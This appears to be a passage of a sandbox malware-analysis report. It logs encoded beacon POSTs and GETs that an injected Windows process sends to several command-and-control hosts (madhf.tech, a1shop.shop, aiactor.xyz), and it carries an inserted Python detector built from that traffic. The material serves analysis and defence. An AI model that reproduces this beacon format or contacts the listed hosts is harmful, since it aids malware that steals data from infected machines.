                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b 72 25 26 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 39 12 15 5e 39 dd 13 d0 b1 47 11 13 de 53 be 91 7b 79 8e c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 cf d8 d7 52 95 d1 5e 3a 70 58 69 87 8a 7e b6 da 6c 41 40 d2 10 f5 8b 3c 3f 1c 0e d9 b3 ba 7c df df ad f2 0f c9 32 8a f2 1c 6e 91 40 02 e9 0e ed 8e c0 d6 30 9f cd a0 d3 ca 59 8f ca 9a ca 03 59 c0 7b 54 3b 42 06 3e 96 00 5d 03 35 08 2f 94 43 ef 6c a7 3d c7 a4 6e 3d d4 d6 81 b7 1d 32 45 7a 6b a2 7a 67 14 69 6b f8 b8 6d 57 52 6d 6f c6 54 e9 14 1e a2 c9 41 9b ca 1e b2 d6 2a 19 50 99 c3 be 95 0a d3 df 3c 5d 26 75 2f ae de 27 d3 65 74 8a 22 72 c7 c0 64 95 9e c0 55 ee fb 68 42 80 47 1a 37 e9 9f d5 de 04 83 cc 9f 84 86 d5 fd b7 51 b3 80 4f cf 4e be dc b2 0e 59 a5 0f 9d 35 9a 2c 87 d6 8b 20 db e3 29 30 9f 58 [TRUNCATED]
                                                                                  Data Ascii: TMo0=pvNl;a"[r%&iPrm:]lQeb3B9^9GS{yqy]\NlR^:pXi~lA@<?|2n@0YY{T;B>]5/Cl=n=2EzkzgikmWRmoTA*P<]&u/'et"rdUhBG7QONY5, )0XdqLZ JL2qw-:bS-GKUM;]}9rt)kgwZ\\ieu"CXZTzW$c.8?7L<)?ZmABW/*nr+w(~|U}Sbv,_Cz


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  39 | 192.168.2.6 | 50029 | 103.224.182.242 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:34:12.974217892 CET | 1841 | OUT | POST /vpqb/ HTTP/1.1
                                                                                  Host: www.madhf.tech
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.madhf.tech
                                                                                  Referer: http://www.madhf.tech/vpqb/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 76 66 69 2b 66 55 6e 38 33 30 77 71 46 41 59 6f 61 4a 6c 32 46 67 37 4a 50 74 43 33 58 6c 62 32 62 44 33 4f 71 6d 72 78 72 42 6f 4e 68 57 74 47 6e 48 69 41 64 73 57 6b 53 73 59 68 61 49 4c 74 71 70 6e 50 62 4d 4b 36 52 41 31 6a 56 2b 48 32 36 4c 47 6a 34 37 30 65 35 68 4f 66 59 4f 47 6c 72 69 4f 75 42 63 63 6c 50 61 6b 65 4b 48 71 6b 4f 38 59 6b 4b 68 2f 4e 6e 47 59 68 44 6a 47 59 49 2f 47 51 37 59 30 4d 48 4f 6d 6f 51 4d 36 6a 76 51 37 4d 53 75 73 4f 47 72 69 6f 37 4d 69 33 69 61 71 47 51 76 4b 4c 32 44 4c 73 75 43 63 6a 71 65 4d 34 58 64 51 4e 53 71 6d 59 79 30 49 48 59 63 34 74 50 52 37 37 65 63 41 5a 70 41 7a 75 2f 44 75 48 50 35 56 39 43 6b 61 35 36 7a 39 35 4a 75 32 70 70 32 6e 6f 6d 34 76 58 6d 62 54 4a 79 50 53 6c 62 35 41 6f 4a 77 74 6d 74 54 6b 5a 66 36 45 6b 4b 57 58 38 50 6d 62 36 45 38 54 79 51 42 2b 5a 6f 51 36 64 75 4c 53 59 75 4e 7a 50 44 50 41 50 38 35 4d 4e 2f 43 69 2b 75 65 31 65 44 6f 42 4c 65 74 79 6d 71 77 54 55 66 6b 42 78 61 6e 33 75 45 76 65 65 4d [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=vfi+fUn830wqFAYoaJl2Fg7JPtC3Xlb2bD3OqmrxrBoNhWtGnHiAdsWkSsYhaILtqpnPbMK6RA1jV+H26LGj470e5hOfYOGlriOuBcclPakeKHqkO8YkKh/NnGYhDjGYI/GQ7Y0MHOmoQM6jvQ7MSusOGrio7Mi3iaqGQvKL2DLsuCcjqeM4XdQNSqmYy0IHYc4tPR77ecAZpAzu/DuHP5V9Cka56z95Ju2pp2nom4vXmbTJyPSlb5AoJwtmtTkZf6EkKWX8Pmb6E8TyQB+ZoQ6duLSYuNzPDPAP85MN/Ci+ue1eDoBLetymqwTUfkBxan3uEveeM [TRUNCATED]
                                                                                  Nov 20, 2024 08:34:13.497000933 CET | 871 | IN | HTTP/1.1 200 OK
                                                                                  date: Wed, 20 Nov 2024 07:34:13 GMT
                                                                                  server: Apache
                                                                                  set-cookie: __tad=1732088053.2947419; expires=Sat, 18-Nov-2034 07:34:13 GMT; Max-Age=315360000
                                                                                  vary: Accept-Encoding
                                                                                  content-encoding: gzip
                                                                                  content-length: 576
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  connection: close
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b 72 25 26 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 39 12 15 5e 39 dd 13 d0 b1 47 11 13 de 53 be 91 7b 79 8e c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 cf d8 d7 52 95 d1 5e 3a 70 58 69 87 8a 7e b6 da 6c 41 40 d2 10 f5 8b 3c 3f 1c 0e d9 b3 ba 7c df df ad f2 0f c9 32 8a f2 1c 6e 91 40 02 e9 0e ed 8e c0 d6 30 9f cd a0 d3 ca 59 8f ca 9a ca 03 59 c0 7b 54 3b 42 06 3e 96 00 5d 03 35 08 2f 94 43 ef 6c a7 3d c7 a4 6e 3d d4 d6 81 b7 1d 32 45 7a 6b a2 7a 67 14 69 6b f8 b8 6d 57 52 6d 6f c6 54 e9 14 1e a2 c9 41 9b ca 1e b2 d6 2a 19 50 99 c3 be 95 0a d3 df 3c 5d 26 75 2f ae de 27 d3 65 74 8a 22 72 c7 c0 64 95 9e c0 55 ee fb 68 42 80 47 1a 37 e9 9f d5 de 04 83 cc 9f 84 86 d5 fd b7 51 b3 80 4f cf 4e be dc b2 0e 59 a5 0f 9d 35 9a 2c 87 d6 8b 20 db e3 29 30 9f 58 [TRUNCATED]
                                                                                  Data Ascii: TMo0=pvNl;a"[r%&iPrm:]lQeb3B9^9GS{yqy]\NlR^:pXi~lA@<?|2n@0YY{T;B>]5/Cl=n=2EzkzgikmWRmoTA*P<]&u/'et"rdUhBG7QONY5, )0XdqLZ JL2qw-:bS-GKUM;]}9rt)kgwZ\\ieu"CXZTzW$c.8?7L<)?ZmABW/*nr+w(~|U}Sbv,_Cz


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  40 | 192.168.2.6 | 50030 | 103.224.182.242 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:34:15.515158892 CET | 552 | OUT | GET /vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov5hXyxvkYczVsVuddv1TKr98fV67HMUUNiXk30NJOQiWMtrF+8k=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.madhf.tech
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:34:16.117191076 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                  date: Wed, 20 Nov 2024 07:34:16 GMT
                                                                                  server: Apache
                                                                                  set-cookie: __tad=1732088056.4264178; expires=Sat, 18-Nov-2034 07:34:16 GMT; Max-Age=315360000
                                                                                  vary: Accept-Encoding
                                                                                  content-length: 1541
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 76 70 71 62 2f 3f 47 52 35 34 79 48 5a 38 3d 69 64 4b 65 63 6b 4c 41 68 32 51 49 47 42 39 4b 5a 4a 49 52 4a 53 2f 6f 5a 4d 47 64 54 77 57 31 46 6a 6d 49 39 46 4c 4d 30 77 51 55 35 7a 73 73 6a 55 33 54 62 38 75 41 4b 66 59 6d 62 37 50 71 79 75 2f 51 66 49 4b 59 5a 51 67 65 46 63 50 6c 77 49 75 6f 76 35 68 58 79 78 76 6b 59 63 7a 56 73 56 75 64 64 76 31 54 4b 72 39 38 66 56 36 37 48 4d 55 55 4e 69 58 6b 33 30 4e 4a 4f 51 69 57 4d 74 72 46 2b [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov5hXyxvkYczVsVuddv1TKr98fV67HMUUNiXk30NJOQiWMtrF+8k=&9xn=fHadNpk8MVax&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body
                                                                                  Nov 20, 2024 08:34:16.117252111 CET | 577 | IN | Data Raw: 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e
                                                                                  Data Ascii: bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov5hXyxvkYczVsVuddv1TKr98fV67HMUUNiXk30NJOQiWMtrF+8k

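Added example, not part of the Joe Sandbox report and not code from the analysed sample: the six sessions above all come from the same injected process (PID 3320) and share one request shape, so the Python below rebuilds that shape from the captured requests and uses it as a detector. The sample requests are transcribed from sessions 35, 36, 37 and 40 (POST bodies shortened where the report truncates them); the benign request, the trait names and the score threshold are the editor's assumptions. Note what the capture does and does not establish: both hosts receive the same 8-character form parameter (GR54yHZ8) and both GETs carry the same second parameter (9xn=fHadNpk8MVax), but the replies are a 404 from www.nuy25c9t.sbs and a parked-domain page with a FingerprintJS redirect from www.madhf.tech, so the traffic alone does not say which host, if any, is the live C2. The example therefore clusters hosts by the shared parameter name rather than by response.

```python
# Added example (editor's code, not the report's or the sample's): extract the
# shape shared by the requests above and cluster hosts by parameter name. Sample
# requests are transcribed from sessions 35, 36, 37 and 40 (POST bodies
# shortened); the benign request, trait names and threshold are assumptions.
import re
from collections import defaultdict
from urllib.parse import urlsplit

# User-Agent string sent in every request of the capture.
UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; "
      ".NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; "
      "InfoPath.3; SLCC2; Media Center PC 6.0)")

def _req(method, host, path, body="", query=""):
    """Build a raw HTTP/1.1 request with the header set seen in the capture."""
    target = path + ("?" + query if query else "")
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}", "Connection: close",
             "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
             f"User-Agent: {UA}"]
    if method == "POST":
        lines += ["Content-Type: application/x-www-form-urlencoded", f"Content-Length: {len(body)}",
                  f"Origin: http://{host}", f"Referer: http://{host}{path}"]
    return "\r\n".join(lines) + "\r\n\r\n" + body

SAMPLES = [
    _req("POST", "www.nuy25c9t.sbs", "/lmj1/",
         body="GR54yHZ8=EwFRfd4q4ZNPM9WAw7clAQLAeEYFtYw/IQqJPX5H8z60Yyjo0H8pAqD5KELYepdejSJL"),
    _req("GET", "www.nuy25c9t.sbs", "/lmj1/",
         query="GR54yHZ8=JytxcoExloxtM9GYw/YkVBPtQn8SsYRrRxOyYElJ8zmzZDKm1RUtP4/aN3HHeJpfiiM3EsU/"
               "TmM7ebohnljNLiPIHS/Z5elBdrknxTUpZLsvI6YW4AGk52pDe9J+i7QDvUP60yU=&9xn=fHadNpk8MVax"),
    _req("POST", "www.madhf.tech", "/vpqb/",
         body="GR54yHZ8=vfi+fUn830wqFhooYq92CA7GT9C3Z1bybD7Oqn+0ozkNgBpGnlKAQMWkCsYlXoLCqpzt"),
    _req("GET", "www.madhf.tech", "/vpqb/",
         query="GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/"
               "QfIKYZQgeFcPlwIuov5hXyxvkYczVsVuddv1TKr98fV67HMUUNiXk30NJOQiWMtrF+8k=&9xn=fHadNpk8MVax"),
]
# Constructed benign request (assumption, not from the capture) for contrast.
BENIGN = ("GET /search?q=swift+copy HTTP/1.1\r\nHost: www.example.com\r\n"
          "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\nConnection: keep-alive\r\n\r\n")
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
SHORT_PATH = re.compile(r"^/[a-z0-9]{4}/$")   # /lmj1/ and /vpqb/ in the capture

def _split_form(data):
    """Split k=v&k=v on '&' and the first '=' only: urllib's parse_qsl would turn
    '+' into a space and drop the base64 padding, corrupting the blobs."""
    params = {}
    for pair in filter(None, data.split("&")):
        key, _, value = pair.partition("=")
        params[key] = value
    return params

def parse_request(raw):
    """Parse a raw HTTP/1.1 request into method, host, path, headers and params."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method, "host": headers.get("host", ""), "path": url.path,
            "headers": headers, "params": _split_form(url.query if method == "GET" else body)}

def beacon_indicators(req):
    """Traits the request shares with the captured traffic (names are the editor's)."""
    h, host, path = req["headers"], req["host"], req["path"]
    hits = []
    if h.get("user-agent") == UA:
        hits.append("capture-user-agent")
    if SHORT_PATH.match(path):
        hits.append("short-random-path")
    if h.get("connection", "").lower() == "close":
        hits.append("connection-close")
    if req["method"] == "POST":
        if h.get("content-type") == "application/x-www-form-urlencoded":
            hits.append("form-post")
        # Origin and Referer claim a form submit from the destination site itself.
        if h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{path}":
            hits.append("self-referer")
    params = req["params"]
    if params and any(len(k) == 8 for k in params) and all(B64_BLOB.match(v) for v in params.values()):
        hits.append("b64-blob-param")
    return hits

def cluster_by_param(reqs):
    """Map each parameter name to the hosts it was sent to: one opaque name reused
    across unrelated domains is what ties the capture's hosts together."""
    by_param = defaultdict(set)
    for r in reqs:
        for key in r["params"]:
            by_param[key].add(r["host"])
    return dict(by_param)

if __name__ == "__main__":
    parsed = [parse_request(r) for r in SAMPLES + [BENIGN]]
    for r in parsed:
        hits = beacon_indicators(r)   # threshold of 4 is an assumption: POSTs score 6, GETs 4
        verdict = "BEACON" if len(hits) >= 4 else "ok"
        print(f"{r['method']:4} {r['host']:18} {r['path']:8} {verdict:6} {hits}")
    for key, hosts in cluster_by_param(parsed).items():
        if len(hosts) > 1:
            print(f"param {key!r} shared by {sorted(hosts)}")
```

Run as a script it prints one verdict line per request and then the parameter names seen on more than one host. Against proxy or Zeek http.log data the same two steps apply: score each request on the header shape, then pivot on the opaque parameter name, which the sample kept constant while rotating hosts and paths; a 404 or a parked-domain reply from a host does not clear it, because the capture shows the implant beaconing to such hosts anyway.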

                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  41 | 192.168.2.6 | 50031 | 13.248.169.48 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:34:21.170445919 CET | 807 | OUT | POST /0krx/ HTTP/1.1
                                                                                  Host: www.a1shop.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.a1shop.shop
                                                                                  Referer: http://www.a1shop.shop/0krx/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Ascii: GR54yHZ8=4AenQeI0YV+kqIWo9XixhPPMmPAWvqYHZHZy27DwKs4+5MJ3O7WH/Ht48lj+viYy6uwdAM5sEICwJvc8fBokj42f1/2GEgnAmbROYUbTlbytHqEb9TEDmyEzqH4aVzml44iHwhQHvq8O6BSlMqfr7zZy40IxKLl54O36ePsnAJ3FQEoVlbA/zbty4TzKY51L239QRoECMCLq


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  42 | 192.168.2.6 | 50032 | 13.248.169.48 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:34:23.727310896 CET | 831 | OUT | POST /0krx/ HTTP/1.1
                                                                                  Host: www.a1shop.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.a1shop.shop
                                                                                  Referer: http://www.a1shop.shop/0krx/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Ascii: GR54yHZ8=4AenQeI0YV+krpmoxU6xgvPPi/AWmKYbZHdy2/zeKZo+gpt3P6WHynt4zFj/riYt6usjAO9sEIGwJvM8fywnxY2dgv2AJAnAmbROYUOIlfWtAa0byWwCrSFBpH4aEjmh44i1wk5cvuMO6BilMfzoxzZolEI6DJ0hhoueVZsKd+jOVy1P5oAchLNw4Rr4YZ1h03FQD/IlD2uJa2M6Th8awX0rIAqcyOOdUA==


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  43 | 192.168.2.6 | 50033 | 13.248.169.48 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:34:26.276673079 CET | 1844 | OUT | POST /0krx/ HTTP/1.1
                                                                                  Host: www.a1shop.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.a1shop.shop
                                                                                  Referer: http://www.a1shop.shop/0krx/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Ascii: GR54yHZ8= [TRUNCATED]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  44 | 192.168.2.6 | 50034 | 13.248.169.48 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:34:28.879338980 CET | 553 | OUT | GET /0krx/?GR54yHZ8=1C2HTrEVNWyxr52SoGOxlLLcvsNBoexmdy9Nu7HdX9lR7swAMLn31GhWzX/WtioZiLgkIr1TIYTpQv4lfQ4TwNnfiM63cxzeqfNeG1D29tziIpAE2Hdr0kt8oEMtEF+W9rbw3UA=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.a1shop.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:34:29.347915888 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 20 Nov 2024 07:34:29 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 277
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GR54yHZ8=1C2HTrEVNWyxr52SoGOxlLLcvsNBoexmdy9Nu7HdX9lR7swAMLn31GhWzX/WtioZiLgkIr1TIYTpQv4lfQ4TwNnfiM63cxzeqfNeG1D29tziIpAE2Hdr0kt8oEMtEF+W9rbw3UA=&9xn=fHadNpk8MVax"}</script></head></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  45 | 192.168.2.6 | 50035 | 13.248.169.48 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:34:34.441217899 CET | 807 | OUT | POST /g2y0/ HTTP/1.1
                                                                                  Host: www.aiactor.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.aiactor.xyz
                                                                                  Referer: http://www.aiactor.xyz/g2y0/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Ascii: GR54yHZ8=1Le5toim1kD1BWHAvUmQ0CgL3Rx9BfwdAIyDi6jsIkY/Lj1uQRT2vjeJOoDdlKRZIJUsCRNSlRDvLOvTqwjHHz5/Gtv2LZh+Sc5BQBbZnOiM2f+uIdgY1Rdq0321SJbSUf5COYE8iuIKF7LX1eTWRXZmr67Bb9/OqCrHdxVBCGngx6XZhE6WnnJzvY1v+4CWxHg0hF0J/slF


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  46 | 192.168.2.6 | 50036 | 13.248.169.48 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:34:36.993566990 CET | 831 | OUT | POST /g2y0/ HTTP/1.1
                                                                                  Host: www.aiactor.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.aiactor.xyz
                                                                                  Referer: http://www.aiactor.xyz/g2y0/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Ascii: GR54yHZ8=1Le5toim1kD1C2XAt3+QlSgIrBx9I/wRAI+Di7WxLX8/KBtuRT72ojeJFIDEqqQbIJIKCTZSlRXvLLDTrH3IFj55fdv0WJh+Sc5BQA/znKOMq/OuO4MX0Rdr1321D5bWUf4nOZYGitgKF67X1qnVInZgv66tLfyZiRbDXTdFW1z9wMKD936113pxvatd+YC8zHY0zS4uwYAmpCDI34AyyUWaI/cYuRR20A==


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  47 | 192.168.2.6 | 50037 | 13.248.169.48 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
